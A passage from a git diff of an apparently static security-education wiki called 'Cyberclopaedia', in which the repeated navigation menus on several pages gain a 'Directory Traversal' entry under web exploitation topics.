      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

The Attack

- - diff --git a/docs/Exploitation/Windows/index.html b/docs/Exploitation/Windows/index.html index 065ea449..e276c8c2 100644 --- a/docs/Exploitation/Windows/index.html +++ b/docs/Exploitation/Windows/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Windows

- - diff --git a/docs/Exploitation/index.html b/docs/Exploitation/index.html index 51c37e5c..35e78ae0 100644 --- a/docs/Exploitation/index.html +++ b/docs/Exploitation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Exploitation - - diff --git a/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html b/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html index 90fb01c6..50c32c04 100644 --- a/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html +++ b/docs/Hardware Hacking/Wireless Attacks/Deauth Attack.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
